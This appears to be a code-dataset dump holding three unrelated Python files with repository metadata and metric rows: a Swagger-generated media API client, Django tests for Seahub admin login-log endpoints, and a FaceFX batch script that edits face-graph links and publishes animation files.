| 0.079415
| 0.14838
| 0.847048
| 0.831439
| 0.821121
| 0.809496
| 0.78716
| 0.778866
| 0
| 0.093328
| 0.259212
| 30,693
| 750
| 121
| 40.924
| 0.580112
| 0.055127
| 0
| 0.664407
| 0
| 0
| 0.01178
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09661
| false
| 0.00678
| 0.00678
| 0.00678
| 0.194915
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68a0c8f18ded78ad8da8ba8b9ba4b7f5ff54ab65
| 27,789
|
py
|
Python
|
general/tasks_importer/sdk/swagger_client/api/media_api.py
|
CitizenScienceCenter/c3s_tools
|
36479905ffbeb2bdabbc2be145dfe4fe7258ef5d
|
[
"Apache-2.0"
] | null | null | null |
general/tasks_importer/sdk/swagger_client/api/media_api.py
|
CitizenScienceCenter/c3s_tools
|
36479905ffbeb2bdabbc2be145dfe4fe7258ef5d
|
[
"Apache-2.0"
] | 1
|
2022-03-22T22:11:21.000Z
|
2022-03-22T22:11:21.000Z
|
general/tasks_importer/sdk/swagger_client/api/media_api.py
|
CitizenScienceCenter/c3s_tools
|
36479905ffbeb2bdabbc2be145dfe4fe7258ef5d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
CCCS
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swagger_client.api_client import ApiClient
class MediaApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_medium(self, **kwargs): # noqa: E501
"""create_medium # noqa: E501
The media details (for files already on the server or remotely hosted) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_medium(async=True)
>>> result = thread.get()
:param async bool
:param media:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.create_medium_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_medium_with_http_info(**kwargs) # noqa: E501
return data
def create_medium_with_http_info(self, **kwargs): # noqa: E501
"""create_medium # noqa: E501
The media details (for files already on the server or remotely hosted) # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.create_medium_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param media:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['media'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_medium" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'media' in params:
body_params = params['media']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_medium(self, id, **kwargs): # noqa: E501
"""Delete all media files related to source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_medium(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_medium_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_medium_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_medium_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete all media files related to source # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_medium_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_medium" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_medium`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `delete_medium`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/source/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_for_source(self, id, **kwargs): # noqa: E501
"""Query media for a specific task or project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_for_source(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_for_source_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_for_source_with_http_info(id, **kwargs) # noqa: E501
return data
def get_for_source_with_http_info(self, id, **kwargs): # noqa: E501
"""Query media for a specific task or project # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_for_source_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_for_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_for_source`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_for_source`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['anonUser', 'apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/source/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[InlineResponse2002]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_media(self, **kwargs): # noqa: E501
"""get_media # noqa: E501
Get a list of media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_media(async=True)
>>> result = thread.get()
:param async bool
:param str search_term:
:param int limit:
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_media_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_media_with_http_info(**kwargs) # noqa: E501
return data
def get_media_with_http_info(self, **kwargs): # noqa: E501
"""get_media # noqa: E501
Get a list of media # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_media_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str search_term:
:param int limit:
:return: list[InlineResponse2002]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['search_term', 'limit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_media" % key
)
params[key] = val
del params['kwargs']
if 'limit' in params and params['limit'] < 0: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `get_media`, must be a value greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'search_term' in params:
query_params.append(('search_term', params['search_term'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['anonUser', 'apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[InlineResponse2002]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_medium(self, id, **kwargs): # noqa: E501
"""Get a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_medium(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_medium_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_medium_with_http_info(id, **kwargs) # noqa: E501
return data
def get_medium_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_medium_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:return: file
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_medium" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_medium`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `get_medium`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['anonUser', 'apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='file', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_medium(self, id, **kwargs): # noqa: E501
"""Put a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_medium(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:param media:
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_medium_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.update_medium_with_http_info(id, **kwargs) # noqa: E501
return data
def update_medium_with_http_info(self, id, **kwargs): # noqa: E501
"""Put a single file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_medium_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param str id: The unique identifer for an Object (i.e. User, Task, Project, Submission etc) (required)
:param media:
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'media'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_medium" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update_medium`") # noqa: E501
if 'id' in params and not re.search('^[a-zA-Z0-9-]+$', params['id']): # noqa: E501
raise ValueError("Invalid value for parameter `id` when calling `update_medium`, must conform to the pattern `/^[a-zA-Z0-9-]+$/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'media' in params:
body_params = params['media']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload(self, attachment, **kwargs): # noqa: E501
"""upload # noqa: E501
Add a new media attachment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.upload(attachment, async=True)
>>> result = thread.get()
:param async bool
:param file attachment: The file to be uploaded (required)
:param str id:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.upload_with_http_info(attachment, **kwargs) # noqa: E501
else:
(data) = self.upload_with_http_info(attachment, **kwargs) # noqa: E501
return data
def upload_with_http_info(self, attachment, **kwargs): # noqa: E501
"""upload # noqa: E501
Add a new media attachment # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.upload_with_http_info(attachment, async=True)
>>> result = thread.get()
:param async bool
:param file attachment: The file to be uploaded (required)
:param str id:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['attachment', 'id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method upload" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'attachment' is set
if ('attachment' not in params or
params['attachment'] is None):
raise ValueError("Missing the required parameter `attachment` when calling `upload`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'attachment' in params:
local_var_files['attachment'] = params['attachment'] # noqa: E501
if 'id' in params:
form_params.append(('id', params['id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyHeader'] # noqa: E501
return self.api_client.call_api(
'/media/upload', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.859673
| 157
| 0.590306
| 3,203
| 27,789
| 4.918514
| 0.06088
| 0.05789
| 0.024883
| 0.031992
| 0.943506
| 0.935381
| 0.929542
| 0.917545
| 0.90504
| 0.883903
| 0
| 0.02107
| 0.310015
| 27,789
| 733
| 158
| 37.911323
| 0.800563
| 0.06499
| 0
| 0.785894
| 1
| 0.012594
| 0.188378
| 0.028885
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.010076
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d7d6c19b8642ba2ca04d256ffc567401db807538
| 3,497
|
py
|
Python
|
tests/api/endpoints/admin/test_login_logs.py
|
weimens/seahub
|
5ecf78ed7a2ddc72a23961804ee41be21c24893f
|
[
"Apache-2.0"
] | 420
|
2015-01-03T11:34:46.000Z
|
2022-03-10T07:15:41.000Z
|
tests/api/endpoints/admin/test_login_logs.py
|
weimens/seahub
|
5ecf78ed7a2ddc72a23961804ee41be21c24893f
|
[
"Apache-2.0"
] | 735
|
2015-01-04T21:22:51.000Z
|
2022-03-31T09:26:07.000Z
|
tests/api/endpoints/admin/test_login_logs.py
|
weimens/seahub
|
5ecf78ed7a2ddc72a23961804ee41be21c24893f
|
[
"Apache-2.0"
] | 379
|
2015-01-05T17:08:03.000Z
|
2022-03-06T00:11:50.000Z
|
import json
import time
import datetime
from django.urls import reverse
from seahub.test_utils import BaseTestCase
try:
from seahub.settings import LOCAL_PRO_DEV_ENV
except ImportError:
LOCAL_PRO_DEV_ENV = False
class LoginLogsTest(BaseTestCase):
def test_get_login_log(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?start=%s&end=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
json_resp = json.loads(resp.content)
assert json_resp[0]['email'] == self.admin.email
def test_can_not_get_if_start_time_invalid(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?star=%s&end=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
self.assertEqual(400, resp.status_code)
def test_can_not_get_if_end_time_invalid(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?start=%s&en=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
self.assertEqual(400, resp.status_code)
def test_can_not_get_if_not_admin(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.user)
end_timestamp = time.time()
start_timestamp = end_timestamp - 7 * 24 * 60 * 60
start_time_str = datetime.datetime.fromtimestamp(start_timestamp).strftime('%Y-%m-%d')
end_time_str = datetime.datetime.fromtimestamp(end_timestamp).strftime('%Y-%m-%d')
para_str = '?start=%s&end=%s' % (start_time_str, end_time_str)
url = reverse('api-v2.1-admin-logs-login') + para_str
resp = self.client.get(url)
self.assertEqual(403, resp.status_code)
class AdminLoginLogsTest(BaseTestCase):
def test_get_logs(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.admin)
url = reverse('api-v2.1-admin-admin-login-logs')
resp = self.client.get(url)
json_resp = json.loads(resp.content)
assert json_resp['data'][0]['email'] == self.admin.email
def test_can_not_get_if_not_admin(self):
if not LOCAL_PRO_DEV_ENV:
return
self.login_as(self.user)
url = reverse('api-v2.1-admin-admin-login-logs')
resp = self.client.get(url)
self.assertEqual(403, resp.status_code)
| 31.504505
| 94
| 0.653131
| 493
| 3,497
| 4.369168
| 0.144016
| 0.051996
| 0.040854
| 0.051996
| 0.865367
| 0.865367
| 0.865367
| 0.865367
| 0.865367
| 0.865367
| 0
| 0.019985
| 0.227338
| 3,497
| 110
| 95
| 31.790909
| 0.777202
| 0
| 0
| 0.746667
| 0
| 0
| 0.08636
| 0.046325
| 0
| 0
| 0
| 0
| 0.08
| 1
| 0.08
| false
| 0
| 0.093333
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d7f36446e604402082d624f583b764f499cb95a2
| 34,277
|
py
|
Python
|
facefx_batch/ProcFaceGraph.py
|
AndreySibiryakov/tools
|
2a78f3ebfac78841eb69b2aa771a2faa10b8d827
|
[
"MIT"
] | 4
|
2017-08-15T12:17:21.000Z
|
2020-03-11T19:11:11.000Z
|
facefx_batch/ProcFaceGraph.py
|
AndreySibiryakov/tools
|
2a78f3ebfac78841eb69b2aa771a2faa10b8d827
|
[
"MIT"
] | null | null | null |
facefx_batch/ProcFaceGraph.py
|
AndreySibiryakov/tools
|
2a78f3ebfac78841eb69b2aa771a2faa10b8d827
|
[
"MIT"
] | 1
|
2020-06-21T00:41:13.000Z
|
2020-06-21T00:41:13.000Z
|
'''
Animation data structure
group
anim
curve
frame:value
'''
from FxStudio import *
from FxAnimation import *
# import AnalysisTextPreprocessor
# reload(AnalysisTextPreprocessor)
import os
from shutil import copyfile
import datetime
class ProcFaceGraph(object):
def __init__(self):
self.fx_path = ''
# {animset_name:animset_path}
self.fx_dir = ''
self.cmds_path = 'u:/face/facefx/facefx_path.txt'
self.target_dir = 'c:/SVN/content/facefx/chrs/'
self.proc_data = {}
self.pc = '_PC'
self.publ_ext = '.facefx_ingame'
self.failed_command = False
self.print_log = 'Commands applied:\n' + fx_command + '\n\n'
self.log_dir = 'u:/face/logs/'
# self.not_copied = ''
def set_console_vars(self):
issueCommand('set -n "po_bake_events_to_curves" -v "0";')
issueCommand('set -n "po_collapse_face_graph" -v "0";')
issueCommand('set -n "po_remove_anim_editor_only_data " -v "1";')
issueCommand('set -n "po_remove_phon_word_lists " -v "1";')
issueCommand('set -n "po_remove_mapping" -v "1";')
issueCommand('set -n "po_destination_dir" -v "%s";' % self.fx_dir)
# For silent, no popups mode
issueCommand('set -n "g_unattended" -v "1";')
def load_actor(self):
issueCommand('loadActor -file "%s"' % self.fx_path)
def save_actor(self):
issueCommand('saveActor -file "%s"' % self.fx_path)
def publish_actor_go(self):
issueCommand('publish -go;')
def read_cmds(self):
data = []
with open(self.cmds_path) as g:
for l in g:
line = l.strip().split("\t")
if len(line) > 1:
data.append(line)
return data
def proc_cmds(self):
data = self.read_cmds()
# d[0] chr name
# d[1] path to .facefx
for d in data:
if self.proc_data.get(d[1]):
self.proc_data[d[1]] += [d[0]]
elif os.path.exists(d[1]):
self.proc_data[d[1]] = [d[0]]
else:
print '# Path not exists', d[1]
def copy(self, names):
for name in names:
base_name = os.path.basename(self.fx_path).split('.')[0]
source_publ_path = os.path.join(
self.fx_dir, base_name + self.pc + self.publ_ext)
target_publ_path = os.path.join(
self.target_dir, name + self.publ_ext)
if os.path.exists(source_publ_path):
copyfile(source_publ_path, target_publ_path)
# self.print_log += 'Copied published file to ' + target_publ_path + '\n'
else:
print '# Published path not exists', source_publ_path
continue
def exec_command(self):
for c in fx_command.split('\n'):
if len(c) == 0:
continue
# Failed facefx commands return False
# an True on success
if not issueCommand('%s' % c):
self.failed_command = True
def proc_facefx(self):
self.proc_cmds()
for path, names in self.proc_data.iteritems():
self.failed_command = False
self.fx_path = path
self.fx_dir = os.path.dirname(path)
self.load_actor()
self.set_console_vars()
self.exec_command()
if self.failed_command:
print '# Not saving file due to errors.'
self.print_log += 'Skipped ' + path + '\n'
continue
self.publish_actor_go()
self.save_actor()
self.print_log += 'Saved ' + path + '\n'
self.copy(names)
print self.print_log
self.write_log()
def write_log(self):
now = datetime.datetime.now()
log_name = now.strftime("%Y%m%d_%H-%M")
log_path = os.path.join(
self.log_dir, log_name + '_facegraph_update.log')
with open(log_path, 'w+') as fx:
fx.write(self.print_log)
fx_command = '''graph -editlink -from "surprise_up_suppressor" -to "surprise_up" -linkfn "corrective" -linkfnparams "Correction Factor=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_r" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
graph -editlink -from "Wonder" -to "surprise_eye_l" -linkfn "linear" -linkfnparams "m=0.5|b=0.000000";
'''
pf = ProcFaceGraph()
pf.proc_facefx()
'''
Used fx commands log:
# Fixs sleep command
graph -addnode -nodetype "FxCombinerNode" -name "sleep" -nodex 9844 -nodey -5650;
graph -link -from "sleep" -to "Blink" -linkfn "linear";
# Fixs missing link for fear emotion
graph -link -from "fear_low_elements" -to "fear_jaw_L" -linkfn "linear";
# Decreases W, U pronounce
graph -editlink -from "phoneme_U" -to "phoneme_U_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "phoneme_W" -to "phoneme_W_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
# Wider mouth open. Worked well for Miller
graph -editlink -from "Normalized Power" -to "jaw_open_general" -linkfn "linear" -linkfnparams "m=0.7|b=0.000000";
# For Anna only due to separate up and down W and U phonemes
graph -editlink -from "Phoneme_W_up" -to "phoneme_W_up_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "phoneme_W" -to "phoneme_W_down_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "Phoneme_U_up" -to "phoneme_U_up_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "phoneme_U" -to "phoneme_U_down_elements" -linkfn "linear" -linkfnparams "m=0.3|b=0.000000";
graph -editlink -from "Normalized Power" -to "jaw_open_general" -linkfn "linear" -linkfnparams "m=0.7|b=0.000000";
# add eye blink corrective setup
graph -addnode -nodetype "FxCombinerNode" -name "mocap_eye_depressor" -nodex -3273 -nodey 4699;
graph -addnode -nodetype "FxCombinerNode" -name "eye_emotions_depressor" -nodex -3273 -nodey 4699;
graph -link -from "Blink" -to "mocap_eye_depressor" -linkfn "linear";
graph -link -from "Blink" -to "eye_emotions_depressor" -linkfn "linear";
